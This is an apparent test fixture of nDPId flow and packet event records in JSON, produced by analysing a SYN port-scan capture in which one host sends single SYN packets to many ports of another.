-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIK8AADIG9cOsEAAIQA2GNIzTeT7dU4MZAAAAAGACDACzTQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzSIyrdUoMYAAAAAGACBAARZQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsVMoAADsGuKisEAAIQA2GNIzSF27dUoMYAAAAAGACEAARIQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0AAADQGaTKsEAAIQA2GNIzSJR\/dUoMYAAAAAGACBAAPcAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zAAADgGEUKsEAAIQA2GNIzSBCbdUoMYAAAAAGACBAAwaQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs2mcAADEGPQusEAAIQA2GNIzSBMHdUoMYAAAAAGACCAArzgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsXjcAACwGvjusEAAIQA2GNIzSw1HdUoMYAAAAAGACBABxPQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsxg8AACsGV2OsEAAIQA2GNIzSDP3dUoMYAAAAAGACEAAbkgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsAGYAADsGDQ2sEAAIQA2GNIzSA\/PdUoMYAAAAAGACEAAknAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsB0kAADQGDSqsEAAIQA2GNIzSBF3dUoMYAAAAAGACBAAwMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAAC0GaSKsEAAIQA2GNIzSBf3dUoMYAAAAAGACCAAqkgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAszUIAACcGVDCsEAAIQA2GNIzSDUzdUoMYAAAAAGACEAAbQwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5AAACsG2eKsEAAIQA2GNIzTB\/PdU4MZAAAAAGACEAAgmQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7zYAADIGJzysEAAIQA2GNIzTANPdU4MZAAAAAGACDAAruQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7vQAACkGMH6sEAAIQA2GNIzTFxPdU4MZAAAAAGACCAAZeQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAswO4AADsGTISsEAAIQA2GNIzTBA3dU4MZAAAAAGACEAAkfwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsw+IAADkGS5CsEAAIQA2GNIzTFvXdU4MZAAAAAGACCAAZlwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAAC4GVkqsEAAIQA2GNIzTE+7dU4MZAAAAAGACDAAYngAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TsAACUGOjesEAAIQA2GNIzTI3jdU4MZAAAAAGACCAANFAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ+IAAC4GspCsEAAIQA2GNIzTApvdU4MZAAAAAGACDAAp8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs+AoAACcGKWisEAAIQA2GNIzTJpbdU4MZAAAAAGACEAAB9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs8zIAADAGJUCsEAAIQA2GNIzTFw7dU4MZAAAAAGACBAAdfgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTwAADgG2zasEAAIQA2GNIzTNdbdU4MZAAAAAGACBAD+tQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsX7wAAC4GurasEAAIQA2GNIzTBJbdU4MZAAAAAGACDAAn9gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 